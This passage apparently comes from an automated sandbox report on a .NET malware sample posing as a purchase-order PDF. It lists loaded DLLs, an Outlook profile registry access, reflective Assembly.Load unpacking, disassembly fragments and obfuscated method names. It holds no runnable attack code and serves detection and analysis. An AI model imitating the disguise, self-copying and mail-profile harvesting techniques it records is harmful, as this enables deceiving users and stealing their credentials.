Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4280b90.2.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	.Net Code: xZm1NgDRCaGjKColeXB System.Reflection.Assembly.Load(byte[])
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	.Net Code: xZm1NgDRCaGjKColeXB System.Reflection.Assembly.Load(byte[])
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	.Net Code: xZm1NgDRCaGjKColeXB System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD7898 push cs; iretd	1_2_08CD78A2
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD8FA9 push ds; iretd	1_2_08CD8FAA
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD8FA0 push ds; iretd	1_2_08CD8FA2
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD5F7B push F805CBFCh; retf	1_2_08CD5F85
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CDC258 push eax; iretd	1_2_08CDC259
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CDC250 pushad ; iretd	1_2_08CDC251
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD77D8 push cs; iretd	1_2_08CD77DA
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD27D3 pushad ; iretd	1_2_08CD27D9
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_08CD77E0 push cs; iretd	1_2_08CD77E2
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_01529C30 push esp; retf 0154h	8_2_01529D55
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_0152891E pushad ; iretd	8_2_0152891F
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_01528DDF push esp; iretd	8_2_01528DE0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_01528C2F pushfd ; iretd	8_2_01528C30
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087F5F78 push F8059FFCh; retf	9_2_087F5F85
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087F27D2 pushad ; iretd	9_2_087F27D9
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_01479C30 push esp; retf 02DAh	13_2_01479D55
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D9233 push es; ret	13_2_069D9244

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Static PE information: section name: .text entropy: 7.862440033564903
Source: QeSBxb.exe.1.dr	Static PE information: section name: .text entropy: 7.862440033564903

Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, PUXfyYhOisseua71nE.cs	High entropy of concatenated method names: 'olTHQSFvXX', 'bLmH1ImYYt', 'RdQHGnljTk', 'zdAHt18exZ', 'eJqH9KaLdo', 'jvpHj0hS1P', 'uTJH7AIdhc', 'CPaHrJVHCP', 'TRgHZuUu75', 'punHYThhMC'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, d3UPZwfTJirq8rKYh5.cs	High entropy of concatenated method names: 'DHfAkkD6G', 'Mwgik0kDC', 'ydX0hyoCS', 'y9HmFdx0G', 'H3Q16hBaC', 'VmgplW6dM', 'BtZjxLuTDX22NxgqPa', 'okCIdeLk4OdPOnJkRl', 'uAsxVMfoV', 'TsadR9nn0'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, Y6jppOOik1jxEfnyeW.cs	High entropy of concatenated method names: 'cVTFqvP20K', 'EdHFMc5s47', 'lcsF5B2irN', 'LDUFBW4tj2', 'DTUFwoFrYW', 'lFXFeNaLnH', 'JqZFEOgUE7', 'lqdxXil0d9', 'vsgxISXe4N', 'DrrxJBYXIP'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, Q14uEPIZB2pWTOX8IE.cs	High entropy of concatenated method names: 'SE4xBiD6vW', 'UrTxwymvCm', 'urkx4hv5p8', 'hIAxeNAmf4', 'Lx9xEfDnFi', 'zVvxCwxytf', 'qL6xRTSYuy', 'k1vx2nbumv', 'zyJx3eWMka', 'JLWx6fpjZy'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, dhCiOE1gurdFYdZ8EU.cs	High entropy of concatenated method names: 'ONM4iyKTOY', 'FyT4067Eax', 'BLB4Q87qWj', 'I8V41OevHe', 'iW04kLdhFl', 'iJ94cquvl2', 'fY04uZFnnY', 'KG04x4bNM9', 'lBD4FYXvfJ', 'JYm4dxgmjR'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, dlgOETSLkDKjaBXuna.cs	High entropy of concatenated method names: 'QLSu3ljN2I', 'meKu6HEtDf', 'ToString', 'jaFuBSVVxn', 'bLEuwpldvP', 'TSSu4f9a1d', 'hXKuevi8yM', 'fjMuEXnjfQ', 'LqMuCbFchM', 'TkLuRyZlWm'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, EcUZlHV5xRcLAB93AA.cs	High entropy of concatenated method names: 'tQ9uICfKRk', 'FjFuOVjqwK', 'zkCxyKoEU4', 'MgOxqHumOa', 'GEsuYPUNXP', 'Dx3ub6PnZr', 'xbWuhNJ5S0', 'itGu8Ovk2j', 'X6susbaTr4', 'jptuNn6Vf0'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, b782kv8OjIfOJ04YOb.cs	High entropy of concatenated method names: 'eyWkZkV0vw', 's1Zkbf84Lu', 'qQ5k85iLHH', 'Vc4ksgqmH0', 'qHpktShYdc', 'S2Uklbs0Tr', 'ujGk9a1cRs', 'AgVkj99yXV', 'KMEkKGPoCy', 'jKvk7862SO'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, haAMWuqMIRY1u5L88Ga.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kGSd81TFoA', 'SuIdsSy5WE', 'jZHdNxdfmv', 'vBndSix9qq', 'yAndPw2OXY', 'G9TdVQTvGF', 'Ps2dXW5oZD'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, PTvxxmJotxLVN9STyr.cs	High entropy of concatenated method names: 'AJXxGQo1VE', 'nwfxt8wa3k', 'hjGxl5Z2km', 'huex9a7yhN', 'RRKx8IBcbi', 'NIXxj1pO3P', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, ux9vSlGKqPeRjOAVLu.cs	High entropy of concatenated method names: 'GIeEUfTglX', 'MbuEwEmHMr', 'Q7WEeaJhNX', 'mCMECSPajP', 'z5SERvXeyf', 'HPNePIJ9n8', 'CnXeV1XuFN', 's5yeXqatLQ', 'BPOeIBRi0E', 'ADveJOvVW7'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, l0rTNDqyDaNsKGgWCtZ.cs	High entropy of concatenated method names: 'XjgFvhYvZ8', 'trIFLWHgDA', 'G5aFAsD7uD', 'TFVFicf4ki', 'xbeFoZ8cQf', 'GQDF0l2Cfj', 'IuvFm60byb', 'kt6FQMf7ZQ', 'TcQF1rMdSM', 'yLgFp3gdpY'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, OcYj6lwsu9665C7RdN.cs	High entropy of concatenated method names: 'Dispose', 'utqqJqXZKy', 'nLGfti9LC0', 'rwxAAqilNt', 'a81qO4uEPZ', 'f2pqzWTOX8', 'ProcessDialogKey', 'WEhfyTvxxm', 'BtxfqLVN9S', 'uyrffO6jpp'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, beyHOCpHso4XwCAhW9.cs	High entropy of concatenated method names: 'kSoeonxfvJ', 'fS7emnTJKH', 'sZk4lldOeZ', 'k6549X86vM', 'j9j4jV1576', 'fBR4KYhm8Z', 'pv847YPTat', 'bPS4r7rUdN', 'tLC4nRCt4I', 'TCx4Z2KOTT'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, TZMrSA5bjF9p5nJuyn.cs	High entropy of concatenated method names: 'CAZqC4HVLf', 'IWEqRtmNwY', 'iguq3rdFYd', 'N8Eq6UqeyH', 'jAhqkW9Tx9', 'xSlqcKqPeR', 'lpgO2aN2q0cKvS865v', 'O67kPTA5rUHnVUQWb2', 'K5NqqsCeAN', 'uEsqMxCOmY'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, l3jrCG705X6hFIo3hF.cs	High entropy of concatenated method names: 'IFJCBJTUAx', 'Od3C4pm37W', 'WxOCEBX913', 'T8SEOrFEdZ', 'lPNEzp6weZ', 'tqjCytTKls', 'lV9CqGDwN8', 'rg1CfVJvYV', 'E0kCMqHcGw', 'e5LC50dHlv'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	High entropy of concatenated method names: 'MwbMU6oMTV', 'LhdMBfOSIY', 's59MwpBZPo', 'qZyM4PNQZ1', 'kNgMewummS', 'TAjME3oBAR', 'FxAMCnwo25', 'qDnMR0mMjX', 'JjhM2Enxy6', 'lI0M3CVgj7'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, N4HVLfQlWEtmNwYgDD.cs	High entropy of concatenated method names: 'caJw8qpg4T', 'lcpwsc7S67', 'aolwNLcUXm', 'GItwSa5kp7', 'whswPCY0XH', 'HNCwVgKREm', 'ih4wXWOdmC', 'RSYwIMn15b', 'LAiwJ2KaVY', 'XRIwO2sffO'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, LijqxanU7dEpkg6cli.cs	High entropy of concatenated method names: 'ssVCvpAh2R', 'sVaCLKyxWT', 'cmKCAAenyY', 'BotCi2YNRm', 'Nx4Coi2MCw', 'thbC0obhQL', 'ndNCmRYRfA', 'TZKCQGAUJJ', 'bgVC1xmXyp', 'O6wCpE5EJA'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, PUXfyYhOisseua71nE.cs	High entropy of concatenated method names: 'olTHQSFvXX', 'bLmH1ImYYt', 'RdQHGnljTk', 'zdAHt18exZ', 'eJqH9KaLdo', 'jvpHj0hS1P', 'uTJH7AIdhc', 'CPaHrJVHCP', 'TRgHZuUu75', 'punHYThhMC'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, d3UPZwfTJirq8rKYh5.cs	High entropy of concatenated method names: 'DHfAkkD6G', 'Mwgik0kDC', 'ydX0hyoCS', 'y9HmFdx0G', 'H3Q16hBaC', 'VmgplW6dM', 'BtZjxLuTDX22NxgqPa', 'okCIdeLk4OdPOnJkRl', 'uAsxVMfoV', 'TsadR9nn0'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, Y6jppOOik1jxEfnyeW.cs	High entropy of concatenated method names: 'cVTFqvP20K', 'EdHFMc5s47', 'lcsF5B2irN', 'LDUFBW4tj2', 'DTUFwoFrYW', 'lFXFeNaLnH', 'JqZFEOgUE7', 'lqdxXil0d9', 'vsgxISXe4N', 'DrrxJBYXIP'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, Q14uEPIZB2pWTOX8IE.cs	High entropy of concatenated method names: 'SE4xBiD6vW', 'UrTxwymvCm', 'urkx4hv5p8', 'hIAxeNAmf4', 'Lx9xEfDnFi', 'zVvxCwxytf', 'qL6xRTSYuy', 'k1vx2nbumv', 'zyJx3eWMka', 'JLWx6fpjZy'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, dhCiOE1gurdFYdZ8EU.cs	High entropy of concatenated method names: 'ONM4iyKTOY', 'FyT4067Eax', 'BLB4Q87qWj', 'I8V41OevHe', 'iW04kLdhFl', 'iJ94cquvl2', 'fY04uZFnnY', 'KG04x4bNM9', 'lBD4FYXvfJ', 'JYm4dxgmjR'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, dlgOETSLkDKjaBXuna.cs	High entropy of concatenated method names: 'QLSu3ljN2I', 'meKu6HEtDf', 'ToString', 'jaFuBSVVxn', 'bLEuwpldvP', 'TSSu4f9a1d', 'hXKuevi8yM', 'fjMuEXnjfQ', 'LqMuCbFchM', 'TkLuRyZlWm'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, EcUZlHV5xRcLAB93AA.cs	High entropy of concatenated method names: 'tQ9uICfKRk', 'FjFuOVjqwK', 'zkCxyKoEU4', 'MgOxqHumOa', 'GEsuYPUNXP', 'Dx3ub6PnZr', 'xbWuhNJ5S0', 'itGu8Ovk2j', 'X6susbaTr4', 'jptuNn6Vf0'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, b782kv8OjIfOJ04YOb.cs	High entropy of concatenated method names: 'eyWkZkV0vw', 's1Zkbf84Lu', 'qQ5k85iLHH', 'Vc4ksgqmH0', 'qHpktShYdc', 'S2Uklbs0Tr', 'ujGk9a1cRs', 'AgVkj99yXV', 'KMEkKGPoCy', 'jKvk7862SO'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, haAMWuqMIRY1u5L88Ga.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kGSd81TFoA', 'SuIdsSy5WE', 'jZHdNxdfmv', 'vBndSix9qq', 'yAndPw2OXY', 'G9TdVQTvGF', 'Ps2dXW5oZD'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, PTvxxmJotxLVN9STyr.cs	High entropy of concatenated method names: 'AJXxGQo1VE', 'nwfxt8wa3k', 'hjGxl5Z2km', 'huex9a7yhN', 'RRKx8IBcbi', 'NIXxj1pO3P', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, ux9vSlGKqPeRjOAVLu.cs	High entropy of concatenated method names: 'GIeEUfTglX', 'MbuEwEmHMr', 'Q7WEeaJhNX', 'mCMECSPajP', 'z5SERvXeyf', 'HPNePIJ9n8', 'CnXeV1XuFN', 's5yeXqatLQ', 'BPOeIBRi0E', 'ADveJOvVW7'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, l0rTNDqyDaNsKGgWCtZ.cs	High entropy of concatenated method names: 'XjgFvhYvZ8', 'trIFLWHgDA', 'G5aFAsD7uD', 'TFVFicf4ki', 'xbeFoZ8cQf', 'GQDF0l2Cfj', 'IuvFm60byb', 'kt6FQMf7ZQ', 'TcQF1rMdSM', 'yLgFp3gdpY'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, OcYj6lwsu9665C7RdN.cs	High entropy of concatenated method names: 'Dispose', 'utqqJqXZKy', 'nLGfti9LC0', 'rwxAAqilNt', 'a81qO4uEPZ', 'f2pqzWTOX8', 'ProcessDialogKey', 'WEhfyTvxxm', 'BtxfqLVN9S', 'uyrffO6jpp'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, beyHOCpHso4XwCAhW9.cs	High entropy of concatenated method names: 'kSoeonxfvJ', 'fS7emnTJKH', 'sZk4lldOeZ', 'k6549X86vM', 'j9j4jV1576', 'fBR4KYhm8Z', 'pv847YPTat', 'bPS4r7rUdN', 'tLC4nRCt4I', 'TCx4Z2KOTT'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, TZMrSA5bjF9p5nJuyn.cs	High entropy of concatenated method names: 'CAZqC4HVLf', 'IWEqRtmNwY', 'iguq3rdFYd', 'N8Eq6UqeyH', 'jAhqkW9Tx9', 'xSlqcKqPeR', 'lpgO2aN2q0cKvS865v', 'O67kPTA5rUHnVUQWb2', 'K5NqqsCeAN', 'uEsqMxCOmY'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, l3jrCG705X6hFIo3hF.cs	High entropy of concatenated method names: 'IFJCBJTUAx', 'Od3C4pm37W', 'WxOCEBX913', 'T8SEOrFEdZ', 'lPNEzp6weZ', 'tqjCytTKls', 'lV9CqGDwN8', 'rg1CfVJvYV', 'E0kCMqHcGw', 'e5LC50dHlv'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, V2mHZPR0N4oyaDDFW0.cs	High entropy of concatenated method names: 'MwbMU6oMTV', 'LhdMBfOSIY', 's59MwpBZPo', 'qZyM4PNQZ1', 'kNgMewummS', 'TAjME3oBAR', 'FxAMCnwo25', 'qDnMR0mMjX', 'JjhM2Enxy6', 'lI0M3CVgj7'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, N4HVLfQlWEtmNwYgDD.cs	High entropy of concatenated method names: 'caJw8qpg4T', 'lcpwsc7S67', 'aolwNLcUXm', 'GItwSa5kp7', 'whswPCY0XH', 'HNCwVgKREm', 'ih4wXWOdmC', 'RSYwIMn15b', 'LAiwJ2KaVY', 'XRIwO2sffO'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, LijqxanU7dEpkg6cli.cs	High entropy of concatenated method names: 'ssVCvpAh2R', 'sVaCLKyxWT', 'cmKCAAenyY', 'BotCi2YNRm', 'Nx4Coi2MCw', 'thbC0obhQL', 'ndNCmRYRfA', 'TZKCQGAUJJ', 'bgVC1xmXyp', 'O6wCpE5EJA'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, PUXfyYhOisseua71nE.cs	High entropy of concatenated method names: 'olTHQSFvXX', 'bLmH1ImYYt', 'RdQHGnljTk', 'zdAHt18exZ', 'eJqH9KaLdo', 'jvpHj0hS1P', 'uTJH7AIdhc', 'CPaHrJVHCP', 'TRgHZuUu75', 'punHYThhMC'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, d3UPZwfTJirq8rKYh5.cs	High entropy of concatenated method names: 'DHfAkkD6G', 'Mwgik0kDC', 'ydX0hyoCS', 'y9HmFdx0G', 'H3Q16hBaC', 'VmgplW6dM', 'BtZjxLuTDX22NxgqPa', 'okCIdeLk4OdPOnJkRl', 'uAsxVMfoV', 'TsadR9nn0'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, Y6jppOOik1jxEfnyeW.cs	High entropy of concatenated method names: 'cVTFqvP20K', 'EdHFMc5s47', 'lcsF5B2irN', 'LDUFBW4tj2', 'DTUFwoFrYW', 'lFXFeNaLnH', 'JqZFEOgUE7', 'lqdxXil0d9', 'vsgxISXe4N', 'DrrxJBYXIP'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, Q14uEPIZB2pWTOX8IE.cs	High entropy of concatenated method names: 'SE4xBiD6vW', 'UrTxwymvCm', 'urkx4hv5p8', 'hIAxeNAmf4', 'Lx9xEfDnFi', 'zVvxCwxytf', 'qL6xRTSYuy', 'k1vx2nbumv', 'zyJx3eWMka', 'JLWx6fpjZy'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, dhCiOE1gurdFYdZ8EU.cs	High entropy of concatenated method names: 'ONM4iyKTOY', 'FyT4067Eax', 'BLB4Q87qWj', 'I8V41OevHe', 'iW04kLdhFl', 'iJ94cquvl2', 'fY04uZFnnY', 'KG04x4bNM9', 'lBD4FYXvfJ', 'JYm4dxgmjR'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, dlgOETSLkDKjaBXuna.cs	High entropy of concatenated method names: 'QLSu3ljN2I', 'meKu6HEtDf', 'ToString', 'jaFuBSVVxn', 'bLEuwpldvP', 'TSSu4f9a1d', 'hXKuevi8yM', 'fjMuEXnjfQ', 'LqMuCbFchM', 'TkLuRyZlWm'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, EcUZlHV5xRcLAB93AA.cs	High entropy of concatenated method names: 'tQ9uICfKRk', 'FjFuOVjqwK', 'zkCxyKoEU4', 'MgOxqHumOa', 'GEsuYPUNXP', 'Dx3ub6PnZr', 'xbWuhNJ5S0', 'itGu8Ovk2j', 'X6susbaTr4', 'jptuNn6Vf0'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, b782kv8OjIfOJ04YOb.cs	High entropy of concatenated method names: 'eyWkZkV0vw', 's1Zkbf84Lu', 'qQ5k85iLHH', 'Vc4ksgqmH0', 'qHpktShYdc', 'S2Uklbs0Tr', 'ujGk9a1cRs', 'AgVkj99yXV', 'KMEkKGPoCy', 'jKvk7862SO'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, haAMWuqMIRY1u5L88Ga.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kGSd81TFoA', 'SuIdsSy5WE', 'jZHdNxdfmv', 'vBndSix9qq', 'yAndPw2OXY', 'G9TdVQTvGF', 'Ps2dXW5oZD'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, PTvxxmJotxLVN9STyr.cs	High entropy of concatenated method names: 'AJXxGQo1VE', 'nwfxt8wa3k', 'hjGxl5Z2km', 'huex9a7yhN', 'RRKx8IBcbi', 'NIXxj1pO3P', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, ux9vSlGKqPeRjOAVLu.cs	High entropy of concatenated method names: 'GIeEUfTglX', 'MbuEwEmHMr', 'Q7WEeaJhNX', 'mCMECSPajP', 'z5SERvXeyf', 'HPNePIJ9n8', 'CnXeV1XuFN', 's5yeXqatLQ', 'BPOeIBRi0E', 'ADveJOvVW7'
